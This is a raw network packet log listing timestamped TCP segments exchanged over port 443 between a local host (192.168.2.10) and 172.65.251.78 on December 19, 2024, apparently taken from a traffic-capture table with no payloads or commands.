                                                                                                                                                                                                                Dec 19, 2024 14:14:25.144443989 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.144463062 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.144531012 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.144541025 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.144577026 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.150984049 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.151005030 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.151061058 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.151070118 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.151091099 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.151114941 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.157860994 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.157880068 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.157932997 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.157941103 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.157983065 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.163707018 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.163733006 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.163805962 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.163815975 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.163842916 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.163863897 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.170332909 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.170355082 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.170428038 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.170435905 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.170466900 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.176091909 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.176117897 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.176177025 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.176184893 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.176198006 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.176228046 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.182661057 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.182682991 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.182748079 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.182754993 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.182789087 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.330949068 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.330975056 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.331059933 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.331085920 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.331120014 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.336734056 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.336754084 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.336788893 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.336796999 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.336833000 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.336850882 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.343156099 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.343178034 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.343223095 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.343230963 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.343270063 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.349741936 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.349760056 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.349814892 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.349821091 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.349852085 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.355971098 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.355988026 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.356049061 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.356056929 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.356091022 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.362502098 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.362520933 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.362560987 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.362571001 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.362593889 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.362616062 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.369260073 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.369276047 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.369328022 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.369343996 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.369391918 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.369391918 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.375148058 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.375164986 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.375219107 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.375246048 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.375262976 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.375327110 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.523420095 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.523456097 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.523509979 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.523529053 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.523555040 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.523581028 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.529584885 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.529609919 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.529654980 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.529664040 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.529710054 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.535449982 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.535485983 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.535531998 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.535545111 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.535589933 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.542212009 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.542234898 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.542324066 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.542335987 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.542373896 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.548557997 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.548584938 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.548631907 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.548645020 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.548681974 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.548707962 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.554786921 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.554809093 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.554853916 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.554863930 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.554903030 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.561247110 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.561271906 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.561314106 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.561325073 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.561356068 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.561373949 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.567296982 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.567327023 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.567363024 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.567370892 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.567406893 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.715775013 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.715845108 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.715903997 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.715985060 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.716043949 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.716043949 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.721615076 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.721676111 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.721713066 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.721731901 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.721766949 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.721786976 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.728240967 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.728271961 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.728322983 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.728339911 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.728378057 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.728426933 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.734431028 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.734450102 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.734513998 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.734534979 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.734586000 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.740829945 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.740849972 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.740927935 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.740943909 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.740993977 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.747236967 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.747255087 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.747339010 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.747356892 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.747410059 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.752974987 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.752991915 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.753078938 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.753106117 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.753154993 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.759682894 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.759701967 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.759769917 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.759788990 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.759840965 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.908320904 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.908356905 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.908399105 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.908427954 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.908443928 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.908471107 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.914067984 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.914087057 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.914139986 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.914155006 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.914177895 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.914196014 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.920746088 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.920768023 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.920829058 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.920844078 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.920882940 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.927258015 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.927277088 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.927336931 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.927345991 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.927391052 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.933577061 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.933593988 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.933650017 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.933660030 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.933696032 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.939965963 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.939985991 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.940037966 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.940049887 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.940092087 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.946609974 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.946638107 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.946702003 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.946710110 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.946763039 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.952303886 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.952322006 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.952373028 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.952379942 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:25.952425957 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.100536108 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.100555897 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.100625992 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.100636959 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.100686073 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.106935024 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.106951952 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.107002974 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.107012033 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.107053041 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.113584042 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.113601923 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.113645077 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.113662958 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.113692045 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.113703012 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.119513035 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.119560957 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.119605064 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.119621038 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.119667053 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.119702101 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.121212959 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.121279001 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.128487110 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.128556013 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.128587008 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.128602982 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.128632069 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.133954048 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.134020090 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.134042978 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.134057999 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.134089947 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.139780998 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.139842987 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.139859915 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.139878988 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.139908075 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.190402985 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.287945032 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.287975073 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.288037062 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.288063049 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.288078070 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.288158894 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.294650078 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.294673920 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.294728041 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.294735909 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.294764042 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.294780016 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.301213980 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.301259041 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.301281929 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.301290035 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.301326036 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.301332951 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.307085991 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.307132959 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.307145119 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.307157040 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.307184935 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.307202101 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.313553095 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.313599110 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.313626051 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.313644886 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.313669920 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.313683987 CET49729443192.168.2.10172.65.251.78
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.320132017 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.320184946 CET44349729172.65.251.78192.168.2.10
                                                                                                                                                                                                                Dec 19, 2024 14:14:26.320219994 CET49729443192.168.2.10172.65.251.78
